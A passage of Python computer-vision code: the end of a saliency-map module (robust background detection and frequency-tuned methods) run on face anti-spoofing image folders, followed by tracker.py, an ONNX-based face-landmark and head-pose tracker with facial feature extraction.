# Saliency Optimization from Robust Background Detection, Wangjiang Zhu, Shuang Liang, Yichen Wei and Jian Sun, IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2014
img = skimage.io.imread(img_path)
if len(img.shape) != 3: # got a grayscale image
img = skimage.color.gray2rgb(img)
img_lab = img_as_float(skimage.color.rgb2lab(img))
img_rgb = img_as_float(img)
img_gray = img_as_float(skimage.color.rgb2gray(img))
segments_slic = slic(img_rgb, n_segments=250, compactness=10, sigma=1, enforce_connectivity=False)
num_segments = len(np.unique(segments_slic))
nrows, ncols = segments_slic.shape
max_dist = math.sqrt(nrows * nrows + ncols * ncols)
grid = segments_slic
(vertices, edges) = make_graph(grid)
gridx, gridy = np.mgrid[:grid.shape[0], :grid.shape[1]]
centers = dict()
colors = dict()
distances = dict()
boundary = dict()
for v in vertices:
centers[v] = [gridy[grid == v].mean(), gridx[grid == v].mean()]
colors[v] = np.mean(img_lab[grid == v], axis=0)
x_pix = gridx[grid == v]
y_pix = gridy[grid == v]
if np.any(x_pix == 0) or np.any(y_pix == 0) or np.any(x_pix == nrows - 1) or np.any(y_pix == ncols - 1):
boundary[v] = 1
else:
boundary[v] = 0
G = nx.Graph()
# buid the graph
for edge in edges:
pt1 = edge[0]
pt2 = edge[1]
color_distance = scipy.spatial.distance.euclidean(colors[pt1], colors[pt2])
G.add_edge(pt1, pt2, weight=color_distance)
# add a new edge in graph if edges are both on boundary
for v1 in vertices:
if boundary[v1] == 1:
for v2 in vertices:
if boundary[v2] == 1:
color_distance = scipy.spatial.distance.euclidean(colors[v1], colors[v2])
G.add_edge(v1, v2, weight=color_distance)
geodesic = np.zeros((len(vertices), len(vertices)), dtype=float)
spatial = np.zeros((len(vertices), len(vertices)), dtype=float)
smoothness = np.zeros((len(vertices), len(vertices)), dtype=float)
adjacency = np.zeros((len(vertices), len(vertices)), dtype=float)
sigma_clr = 10.0
sigma_bndcon = 1.0
sigma_spa = 0.25
mu = 0.1
all_shortest_paths_color = nx.shortest_path(G, source=None, target=None, weight='weight')
for v1 in vertices:
for v2 in vertices:
if v1 == v2:
geodesic[v1, v2] = 0
spatial[v1, v2] = 0
smoothness[v1, v2] = 0
else:
geodesic[v1, v2] = path_length(all_shortest_paths_color[v1][v2], G)
spatial[v1, v2] = scipy.spatial.distance.euclidean(centers[v1], centers[v2]) / max_dist
smoothness[v1, v2] = math.exp(
- (geodesic[v1, v2] * geodesic[v1, v2]) / (2.0 * sigma_clr * sigma_clr)) + mu
for edge in edges:
pt1 = edge[0]
pt2 = edge[1]
adjacency[pt1, pt2] = 1
adjacency[pt2, pt1] = 1
for v1 in vertices:
for v2 in vertices:
smoothness[v1, v2] = adjacency[v1, v2] * smoothness[v1, v2]
area = dict()
len_bnd = dict()
bnd_con = dict()
w_bg = dict()
ctr = dict()
wCtr = dict()
for v1 in vertices:
area[v1] = 0
len_bnd[v1] = 0
ctr[v1] = 0
for v2 in vertices:
d_app = geodesic[v1, v2]
d_spa = spatial[v1, v2]
w_spa = math.exp(- ((d_spa) * (d_spa)) / (2.0 * sigma_spa * sigma_spa))
area_i = S(v1, v2, geodesic)
area[v1] += area_i
len_bnd[v1] += area_i * boundary[v2]
ctr[v1] += d_app * w_spa
bnd_con[v1] = len_bnd[v1] / math.sqrt(area[v1])
w_bg[v1] = 1.0 - math.exp(- (bnd_con[v1] * bnd_con[v1]) / (2 * sigma_bndcon * sigma_bndcon))
for v1 in vertices:
wCtr[v1] = 0
for v2 in vertices:
d_app = geodesic[v1, v2]
d_spa = spatial[v1, v2]
w_spa = math.exp(- (d_spa * d_spa) / (2.0 * sigma_spa * sigma_spa))
wCtr[v1] += d_app * w_spa * w_bg[v2]
# normalise value for wCtr
min_value = min(wCtr.values())
max_value = max(wCtr.values())
minVal = [key for key, value in wCtr.items() if value == min_value]
maxVal = [key for key, value in wCtr.items() if value == max_value]
for v in vertices:
wCtr[v] = (wCtr[v] - min_value) / (max_value - min_value)
img_disp1 = img_gray.copy()
img_disp2 = img_gray.copy()
x = compute_saliency_cost(smoothness, w_bg, wCtr)
for v in vertices:
img_disp1[grid == v] = x[v]
img_disp2 = img_disp1.copy()
sal = np.zeros((img_disp1.shape[0], img_disp1.shape[1], 3))
sal = img_disp2
sal_max = np.max(sal)
sal_min = np.min(sal)
sal = 255 * ((sal - sal_min) / (sal_max - sal_min))
return sal
def get_saliency_ft(img_path):
# Saliency map calculation based on:
img = skimage.io.imread(img_path)
img_rgb = img_as_float(img)
img_lab = skimage.color.rgb2lab(img_rgb)
mean_val = np.mean(img_rgb, axis=(0, 1))
kernel_h = (1.0 / 16.0) * np.array([[1, 4, 6, 4, 1]])
kernel_w = kernel_h.transpose()
blurred_l = scipy.signal.convolve2d(img_lab[:, :, 0], kernel_h, mode='same')
blurred_a = scipy.signal.convolve2d(img_lab[:, :, 1], kernel_h, mode='same')
blurred_b = scipy.signal.convolve2d(img_lab[:, :, 2], kernel_h, mode='same')
blurred_l = scipy.signal.convolve2d(blurred_l, kernel_w, mode='same')
blurred_a = scipy.signal.convolve2d(blurred_a, kernel_w, mode='same')
blurred_b = scipy.signal.convolve2d(blurred_b, kernel_w, mode='same')
im_blurred = np.dstack([blurred_l, blurred_a, blurred_b])
sal = np.linalg.norm(mean_val - im_blurred, axis=2)
sal_max = np.max(sal)
sal_min = np.min(sal)
sal = 255 * ((sal - sal_min) / (sal_max - sal_min))
return sal
def extract_rbd_saliency_folder(folder_path, output_root):
print('Extract saliency called')
files = os.listdir(folder_path)
start_time = time.time()
with concurrent.futures.ProcessPoolExecutor() as executor:
for raw_frame in files:
frame_path = os.path.join(folder_path, raw_frame)
output_path = os.path.join(output_root, raw_frame)
print('executor submited')
executor.submit(extract_rbd_saliency, frame_path, output_path)
# threads = []
# for frame in files:
# print('Saliency on ' + frame)
# path_frame = os.path.join(folder_path, frame)
# output_path = os.path.join(output_root, frame)
# thread = Thread(target=extract_rbd_saliency, args=(path_frame, output_path))
# threads.append(thread)
# thread.start()
#
# for thread in threads:
# thread.join()
print("--- %d seconds avg---" % ((time.time() - start_time) / len(files)))
def extract_rbd_saliency(file_path, output_path):
print('extracting saliency for ' + file_path + ' output:' + output_path)
if not os.path.exists(output_path):
try:
rbd = get_saliency_rbd(file_path).astype('uint8')
cv2.imwrite(output_path, rbd)
except Exception as e:
print(e)
else:
print('saliency already exists')
if __name__ == '__main__':
extract_rbd_saliency('/codes/bresan/remote/spoopy/spoopy/data/extracted_maps/csbr/cbsr/all/test/attack/attack/raw/2_3_frame_0.jpg',
'/codes/bresan/remote/spoopy/spoopy/data/extracted_maps/csbr/cbsr/all/test/attack/attack/saliency_raw/2_3_frame_0.jpg')
|
tracker.py
|
import os
import numpy as np
import math
import cv2
import onnxruntime
import time
import queue
import threading
import copy
from similaritytransform import SimilarityTransform
from retinaface import RetinaFaceDetector
from remedian import remedian
def resolve(name):
f = os.path.join(os.path.dirname(__file__), name)
return f
def clamp_to_im(pt, w, h):
x = pt[0]
y = pt[1]
if x < 0:
x = 0
if y < 0:
y = 0
if x >= w:
x = w-1
if y >= h:
y = h-1
return (int(x), int(y+1))
def rotate(origin, point, a):
a = -a
ox, oy = origin
px, py = point
qx = ox + math.cos(a) * (px - ox) - math.sin(a) * (py - oy)
qy = oy + math.sin(a) * (px - ox) + math.cos(a) * (py - oy)
return qx, qy
def angle(p1, p2):
p1 = np.array(p1)
p2 = np.array(p2)
a = np.arctan2(*(p2 - p1)[::-1])
return (a % (2 * np.pi))
def compensate(p1, p2):
a = angle(p1, p2)
return rotate(p1, p2, a), a
def rotate_image(image, a, center):
(h, w) = image.shape[:2]
a = np.rad2deg(a)
M = cv2.getRotationMatrix2D((float(center[0]), float(center[1])), a, 1.0)
rotated = cv2.warpAffine(image, M, (w, h))
return rotated
def intersects(r1, r2, amount=0.3):
area1 = r1[2] * r1[3]
area2 = r2[2] * r2[3]
inter = 0.0
total = area1 + area2
r1_x1, r1_y1, w, h = r1
r1_x2 = r1_x1 + w
r1_y2 = r1_y1 + h
r2_x1, r2_y1, w, h = r2
r2_x2 = r2_x1 + w
r2_y2 = r2_y1 + h
left = max(r1_x1, r2_x1)
right = min(r1_x2, r2_x2)
top = max(r1_y1, r2_y1)
bottom = min(r1_y2, r2_y2)
if left < right and top < bottom:
inter = (right - left) * (bottom - top)
total -= inter
if inter / total >= amount:
return True
return False
#return not (r1_x1 > r2_x2 or r1_x2 < r2_x1 or r1_y1 > r2_y2 or r1_y2 < r2_y1)
def group_rects(rects):
rect_groups = {}
for rect in rects:
rect_groups[str(rect)] = [-1, -1, []]
group_id = 0
for i, rect in enumerate(rects):
name = str(rect)
group = group_id
group_id += 1
if rect_groups[name][0] < 0:
rect_groups[name] = [group, -1, []]
else:
group = rect_groups[name][0]
for j, other_rect in enumerate(rects):
if i == j:
continue;
inter = intersects(rect, other_rect)
if intersects(rect, other_rect):
rect_groups[str(other_rect)] = [group, -1, []]
return rect_groups
def logit(p, factor=16.0):
if p >= 1.0:
p = 0.9999999
if p <= 0.0:
p = 0.0000001
p = p/(1-p)
return float(np.log(p)) / float(factor)
def logit_arr(p, factor=16.0):
p = np.clip(p, 0.0000001, 0.9999999)
return np.log(p / (1 - p)) / float(factor)
def matrix_to_quaternion(m):
t = 0.0
q = [0.0, 0.0, 0, 0.0]
if m[2,2] < 0:
if m[0,0] > m[1,1]:
t = 1 + m[0,0] - m[1,1] - m[2,2]
q = [t, m[0,1]+m[1,0], m[2,0]+m[0,2], m[1,2]-m[2,1]]
else:
t = 1 - m[0,0] + m[1,1] - m[2,2]
q = [m[0,1]+m[1,0], t, m[1,2]+m[2,1], m[2,0]-m[0,2]]
else:
if m[0,0] < -m[1,1]:
t = 1 - m[0,0] - m[1,1] + m[2,2]
q = [m[2,0]+m[0,2], m[1,2]+m[2,1], t, m[0,1]-m[1,0]]
else:
t = 1 + m[0,0] + m[1,1] + m[2,2]
q = [m[1,2]-m[2,1], m[2,0]-m[0,2], m[0,1]-m[1,0], t]
q = np.array(q, np.float32) * 0.5 / np.sqrt(t)
return q
def worker_thread(session, frame, input, crop_info, queue, input_name, idx, tracker):
output = session.run([], {input_name: input})[0]
conf, lms = tracker.landmarks(output[0], crop_info)
if conf > tracker.threshold:
try:
eye_state = tracker.get_eye_state(frame, lms)
except:
eye_state = [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
queue.put((session, conf, (lms, eye_state), crop_info, idx))
else:
queue.put((session,))
class Feature():
def __init__(self, threshold=0.15, alpha=0.2, hard_factor=0.15, decay=0.001, max_feature_updates=0):
self.median = remedian()
self.min = None
self.max = None
self.hard_min = None
self.hard_max = None
self.threshold = threshold
self.alpha = alpha
self.hard_factor = hard_factor
self.decay = decay
self.last = 0
self.current_median = 0
self.update_count = 0
self.max_feature_updates = max_feature_updates
self.first_seen = -1
self.updating = True
def update(self, x, now=0):
if self.max_feature_updates > 0:
if self.first_seen == -1:
self.first_seen = now;
new = self.update_state(x, now=now)
filtered = self.last * self.alpha + new * (1 - self.alpha)
self.last = filtered
return filtered
def update_state(self, x, now=0):
updating = self.updating and (self.max_feature_updates == 0 or now - self.first_seen < self.max_feature_updates)
if updating:
self.median + x
self.current_median = self.median.median()
else:
self.updating = False
median = self.current_median
if self.min is None:
if x < median and (median - x) / median > self.threshold:
if updating:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
return 0
else:
if x < self.min:
if updating:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
if self.max is None:
if x > median and (x - median) / median > self.threshold:
if updating:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
return 0
else:
if x > self.max:
if updating:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
if updating:
if self.min < self.hard_min:
self.min = self.hard_min * self.decay + self.min * (1 - self.decay)
if self.max > self.hard_max:
self.max = self.hard_max * self.decay + self.max * (1 - self.decay)
if x < median:
return - (1 - (x - self.min) / (median - self.min))
elif x > median:
return (x - median) / (self.max - median)
return 0
class FeatureExtractor():
def __init__(self, max_feature_updates=0):
self.eye_l = Feature(max_feature_updates=max_feature_updates)
self.eye_r = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_updown_l = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_updown_r = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_quirk_l = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_quirk_r = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_steepness_l = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_steepness_r = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.mouth_corner_updown_l = Feature(max_feature_updates=max_feature_updates)
self.mouth_corner_updown_r = Feature(max_feature_updates=max_feature_updates)
self.mouth_corner_inout_l = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
self.mouth_corner_inout_r = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
self.mouth_open = Feature(max_feature_updates=max_feature_updates)
self.mouth_wide = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
def align_points(self, a, b, pts):
a = tuple(a)
b = tuple(b)
alpha = angle(a, b)
alpha = np.rad2deg(alpha)
if alpha >= 90:
alpha = - (alpha - 180)
if alpha <= -90:
alpha = - (alpha + 180)
alpha = np.deg2rad(alpha)
aligned_pts = []
for pt in pts:
aligned_pts.append(np.array(rotate(a, pt, alpha)))
return alpha, np.array(aligned_pts)
def update(self, pts, full=True):
features = {}
now = time.perf_counter()
norm_distance_x = np.mean([pts[0, 0] - pts[16, 0], pts[1, 0] - pts[15, 0]])
norm_distance_y = np.mean([pts[27, 1] - pts[28, 1], pts[28, 1] - pts[29, 1], pts[29, 1] - pts[30, 1]])
a1, f_pts = self.align_points(pts[42], pts[45], pts[[43, 44, 47, 46]])
f = abs((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y)
features["eye_l"] = self.eye_l.update(f, now)
a2, f_pts = self.align_points(pts[36], pts[39], pts[[37, 38, 41, 40]])
f = abs((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y)
features["eye_r"] = self.eye_r.update(f, now)
if full:
a3, _ = self.align_points(pts[0], pts[16], [])
a4, _ = self.align_points(pts[31], pts[35], [])
norm_angle = np.mean(list(map(np.rad2deg, [a1, a2, a3, a4])))
a, f_pts = self.align_points(pts[22], pts[26], pts[[22, 23, 24, 25, 26]])
features["eyebrow_steepness_l"] = self.eyebrow_steepness_l.update(-np.rad2deg(a) - norm_angle, now)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_l"] = self.eyebrow_quirk_l.update(f, now)
a, f_pts = self.align_points(pts[17], pts[21], pts[[17, 18, 19, 20, 21]])
features["eyebrow_steepness_r"] = self.eyebrow_steepness_r.update(np.rad2deg(a) - norm_angle, now)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_r"] = self.eyebrow_quirk_r.update(f, now)
else:
features["eyebrow_steepness_l"] = 0.
features["eyebrow_steepness_r"] = 0.
features["eyebrow_quirk_l"] = 0.
features["eyebrow_quirk_r"] = 0.
f = (np.mean([pts[22, 1], pts[26, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_l"] = self.eyebrow_updown_l.update(f, now)
f = (np.mean([pts[17, 1], pts[21, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_r"] = self.eyebrow_updown_r.update(f, now)
upper_mouth_line = np.mean([pts[49, 1], pts[50, 1], pts[51, 1]])
center_line = np.mean([pts[50, 0], pts[60, 0], pts[27, 0], pts[30, 0], pts[64, 0], pts[55, 0]])
f = (upper_mouth_line - pts[62, 1]) / norm_distance_y
features["mouth_corner_updown_l"] = self.mouth_corner_updown_l.update(f, now)
if full:
f = abs(center_line - pts[62, 0]) / norm_distance_x
features["mouth_corner_inout_l"] = self.mouth_corner_inout_l.update(f, now)
else:
features["mouth_corner_inout_l"] = 0.
f = (upper_mouth_line - pts[58, 1]) / norm_distance_y
features["mouth_corner_updown_r"] = self.mouth_corner_updown_r.update(f, now)
if full:
f = abs(center_line - pts[58, 0]) / norm_distance_x
features["mouth_corner_inout_r"] = self.mouth_corner_inout_r.update(f, now)
else:
features["mouth_corner_inout_r"] = 0.
f = abs(np.mean(pts[[59,60,61], 1], axis=0) - np.mean(pts[[63,64,65], 1], axis=0)) / norm_distance_y
features["mouth_open"] = self.mouth_open.update(f, now)
f = abs(pts[58, 0] - pts[62, 0]) / norm_distance_x
features["mouth_wide"] = self.mouth_wide.update(f, now)
return features
class FaceInfo():
def __init__(self, id, tracker):
self.id = id
self.frame_count = -1
self.tracker = tracker
self.contour_pts = [0,1,8,15,16,27,28,29,30,31,32,33,34,35]
self.face_3d = copy.copy(self.tracker.face_3d)
if self.tracker.model_type == -1:
self.contour_pts = [0,2,8,14,16,27,30,33]
self.reset()
self.alive = False
self.coord = None
self.base_scale_v = self.tracker.face_3d[27:30, 1] - self.tracker.face_3d[28:31, 1]
self.base_scale_h = np.abs(self.tracker.face_3d[[0, 36, 42], 0] - self.tracker.face_3d[[16, 39, 45], 0])
self.limit_3d_adjustment = True
self.update_count_delta = 75.
self.update_count_max = 7500.
if self.tracker.max_feature_updates > 0:
self.features = FeatureExtractor(self.tracker.max_feature_updates)
def reset(self):
self.alive = False
self.conf = None
self.lms = None
self.eye_state = None
self.rotation = None
self.translation = None
self.success = None
self.quaternion = None
self.euler = None
self.pnp_error = None
self.pts_3d = None
self.eye_blink = None
self.bbox = None
self.pnp_error = 0
if self.tracker.max_feature_updates < 1:
self.features = FeatureExtractor(0)
self.current_features = {}
self.contour = np.zeros((21,3))
self.update_counts = np.zeros((66,2))
self.update_contour()
self.fail_count = 0
def update(self, result, coord, frame_count):
self.frame_count = frame_count
if result is None:
self.reset()
else:
self.conf, (self.lms, self.eye_state) = result
self.coord = coord
self.alive = True
def update_contour(self):
self.contour = np.array(self.face_3d[self.contour_pts])
def normalize_pts3d(self, pts_3d):
# Calculate angle using nose
pts_3d[:, 0:2] -= pts_3d[30, 0:2]
alpha = angle(pts_3d[30, 0:2], pts_3d[27, 0:2])
alpha -= np.deg2rad(90)
R = np.matrix([[np.cos(alpha), -np.sin(alpha)], [np.sin(alpha), np.cos(alpha)]])
pts_3d[:, 0:2] = (pts_3d - pts_3d[30])[:, 0:2].dot(R) + pts_3d[30, 0:2]
# Vertical scale
pts_3d[:, 1] /= np.mean((pts_3d[27:30, 1] - pts_3d[28:31, 1]) / self.base_scale_v)
# Horizontal scale
pts_3d[:, 0] /= np.mean(np.abs(pts_3d[[0, 36, 42], 0] - pts_3d[[16, 39, 45], 0]) / self.base_scale_h)
return pts_3d
def adjust_3d(self):
if self.conf < 0.4 or self.pnp_error > 300:
return
if self.tracker.model_type != -1 and not self.tracker.static_model:
max_runs = 1
eligible = np.delete(np.arange(0, 66), [30])
changed_any = False
update_type = -1
d_o = np.ones((66,))
d_c = np.ones((66,))
for runs in range(max_runs):
r = 1.0 + np.random.random_sample((66,3)) * 0.02 - 0.01
r[30, :] = 1.0
if self.euler[0] > -165 and self.euler[0] < 145:
continue
elif self.euler[1] > -10 and self.euler[1] < 20:
r[:, 2] = 1.0
update_type = 0
else:
r[:, 0:2] = 1.0
if self.euler[2] > 120 or self.euler[2] < 60:
continue
# Enable only one side of the points, depending on direction
elif self.euler[1] < -10:
update_type = 1
r[[0, 1, 2, 3, 4, 5, 6, 7, 17, 18, 19, 20, 21, 31, 32, 36, 37, 38, 39, 40, 41, 48, 49, 56, 57, 58, 59, 65], 2] = 1.0
eligible = [8, 9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 27, 28, 29, 33, 34, 35, 42, 43, 44, 45, 46, 47, 50, 51, 52, 53, 54, 55, 60, 61, 62, 63, 64]
else:
update_type = 1
r[[9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 34, 35, 42, 43, 44, 45, 46, 47, 51, 52, 53, 54, 61, 62, 63], 2] = 1.0
eligible = [0, 1, 2, 3, 4, 5, 6, 7, 8, 17, 18, 19, 20, 21, 27, 28, 29, 31, 32, 33, 36, 37, 38, 39, 40, 41, 48, 49, 50, 55, 56, 57, 58, 59, 60, 64, 65]
if self.limit_3d_adjustment:
eligible = np.nonzero(self.update_counts[:, update_type] < self.update_counts[:, abs(update_type - 1)] + self.update_count_delta)[0]
if eligible.shape[0] <= 0:
break
if runs == 0:
updated = copy.copy(self.face_3d[0:66])
o_projected = np.ones((66,2))
o_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(self.face_3d[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
c = updated * r
c_projected = np.zeros((66,2))
c_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(c[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
changed = False
d_o[eligible] = np.linalg.norm(o_projected[eligible] - self.lms[eligible, 0:2], axis=1)
d_c[eligible] = np.linalg.norm(c_projected[eligible] - self.lms[eligible, 0:2], axis=1)
indices = np.nonzero(d_c < d_o)[0]
if indices.shape[0] > 0:
if self.limit_3d_adjustment:
indices = np.intersect1d(indices, eligible)
if indices.shape[0] > 0:
self.update_counts[indices, update_type] += 1
updated[indices] = c[indices]
o_projected[indices] = c_projected[indices]
changed = True
changed_any = changed_any or changed
if not changed:
break
if changed_any:
# Update weighted by point confidence
weights = np.zeros((66,3))
weights[:, :] = self.lms[0:66, 2:3]
weights[weights > 0.7] = 1.0
weights = 1.0 - weights
update_indices = np.arange(0, 66)
if self.limit_3d_adjustment:
update_indices = np.nonzero(self.update_counts[:, update_type] <= self.update_count_max)[0]
self.face_3d[update_indices] = self.face_3d[update_indices] * weights[update_indices] + updated[update_indices] * (1. - weights[update_indices])
self.update_contour()
self.pts_3d = self.normalize_pts3d(self.pts_3d)
if self.tracker.feature_level == 2:
self.current_features = self.features.update(self.pts_3d[:, 0:2])
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
elif self.tracker.feature_level == 1:
self.current_features = self.features.update(self.pts_3d[:, 0:2], False)
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
def get_model_base_path(model_dir):
model_base_path = resolve(os.path.join("models"))
if model_dir is None:
if not os.path.exists(model_base_path):
model_base_path = resolve(os.path.join("..", "models"))
else:
model_base_path = model_dir
return model_base_path
class Tracker():
def __init__(self, width, height, model_type=3, detection_threshold=0.6, threshold=None, max_faces=1, discard_after=5, scan_every=3, bbox_growth=0.0, max_threads=4, silent=False, model_dir=None, no_gaze=False, use_retinaface=False, max_feature_updates=0, static_model=False, feature_level=2, try_hard=False):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = min(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.model_type = model_type
self.models = [
"lm_model0_opt.onnx",
"lm_model1_opt.onnx",
"lm_model2_opt.onnx",
"lm_model3_opt.onnx",
"lm_model4_opt.onnx"
]
model = "lm_modelT_opt.onnx"
if model_type >= 0:
model = self.models[self.model_type]
if model_type == -2:
model = "lm_modelV_opt.onnx"
if model_type == -3:
model = "lm_modelU_opt.onnx"
model_base_path = get_model_base_path(model_dir)
if threshold is None:
threshold = 0.6
if model_type < 0:
threshold = 0.87
self.retinaface = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=max(max_threads,4), top_k=max_faces, res=(640, 640))
self.retinaface_scan = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=2, top_k=max_faces, res=(640, 640))
self.use_retinaface = use_retinaface
# Single face instance with multiple threads
self.session = onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options)
# Multiple faces with single threads
self.sessions = []
self.max_workers = max(min(max_threads, max_faces), 1)
extra_threads = max_threads % self.max_workers
for i in range(self.max_workers):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = min(max(max_threads // self.max_workers, 4), 1)
if options.intra_op_num_threads < 1:
options.intra_op_num_threads = 1
elif i < extra_threads:
options.intra_op_num_threads += 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
self.sessions.append(onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options))
self.input_name = self.session.get_inputs()[0].name
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.gaze_model = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
self.detection = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_detection_opt.onnx"), sess_options=options)
self.faces = []
# Image normalization constants
self.mean = np.float32(np.array([0.485, 0.456, 0.406]))
self.std = np.float32(np.array([0.229, 0.224, 0.225]))
self.mean = self.mean / self.std
self.std = self.std * 255.0
self.mean = - self.mean
self.std = 1.0 / self.std
self.mean_32 = np.tile(self.mean, [32, 32, 1])
self.std_32 = np.tile(self.std, [32, 32, 1])
self.mean_224 = np.tile(self.mean, [224, 224, 1])
self.std_224 = np.tile(self.std, [224, 224, 1])
# PnP solving
self.face_3d = np.array([
[ 0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.448998827123556, 0.166995837790733, -0.765143004071253],
[ 0.437431554952677, 0.022655479179981, -0.739267175112735],
[ 0.415033422928434, -0.088941454648772, -0.747947437846473],
[ 0.389123587370091, -0.232380029794684, -0.704788385327458],
[ 0.334630113904382, -0.361265387599081, -0.615587579236862],
[ 0.263725112132858, -0.460009725616771, -0.491479221041573],
[ 0.16241621322721 , -0.558037146073869, -0.339445180872282],
[ 0. , -0.621079019321682, -0.287294770748887],
[-0.16241621322721 , -0.558037146073869, -0.339445180872282],
[-0.263725112132858, -0.460009725616771, -0.491479221041573],
[-0.334630113904382, -0.361265387599081, -0.615587579236862],
[-0.389123587370091, -0.232380029794684, -0.704788385327458],
[-0.415033422928434, -0.088941454648772, -0.747947437846473],
[-0.437431554952677, 0.022655479179981, -0.739267175112735],
[-0.448998827123556, 0.166995837790733, -0.765143004071253],
[-0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0.322196658344302, 0.464439136821772, -0.250558059367669],
[ 0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[ 0.186875436782135, 0.44706071961879 , -0.145299823706503],
[ 0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.186875436782135, 0.44706071961879 , -0.145299823706503],
[-0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[-0.322196658344302, 0.464439136821772, -0.250558059367669],
[-0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0. , 0.293332603215811, -0.137582088779393],
[ 0. , 0.194828701837823, -0.069158109325951],
[ 0. , 0.103844017393155, -0.009151819844964],
[ 0. , 0. , 0. ],
[ 0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.046439347377934, -0.057675223874769, -0.102990627164664],
[ 0. , -0.068753126205604, -0.090545348482397],
[-0.046439347377934, -0.057675223874769, -0.102990627164664],
[-0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.315905195966084, 0.298337502555443, -0.285107407636464],
[ 0.275252345439353, 0.312721904921771, -0.244558251170671],
[ 0.176394511553111, 0.311907184376107, -0.219205360345231],
[ 0.131229723798772, 0.284447361805627, -0.234239149487417],
[ 0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.131229723798772, 0.284447361805627, -0.234239149487417],
[-0.176394511553111, 0.311907184376107, -0.219205360345231],
[-0.275252345439353, 0.312721904921771, -0.244558251170671],
[-0.315905195966084, 0.298337502555443, -0.285107407636464],
[-0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.121155252430729, -0.208988660580347, -0.160606287940521],
[ 0.041356305910044, -0.194484199722098, -0.096159882202821],
[ 0. , -0.205180167345702, -0.083299217789729],
[-0.041356305910044, -0.194484199722098, -0.096159882202821],
[-0.121155252430729, -0.208988660580347, -0.160606287940521],
[-0.132325402795928, -0.290857984604968, -0.187067868218105],
[-0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0. , -0.343742581679188, -0.113925986025684],
[ 0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0.132325402795928, -0.290857984604968, -0.187067868218105],
[ 0.181481567104525, -0.243239316141725, -0.231284988892766],
[ 0.083999507750469, -0.239717753728704, -0.155256465640701],
[ 0. , -0.256058040176369, -0.0950619498899 ],
[-0.083999507750469, -0.239717753728704, -0.155256465640701],
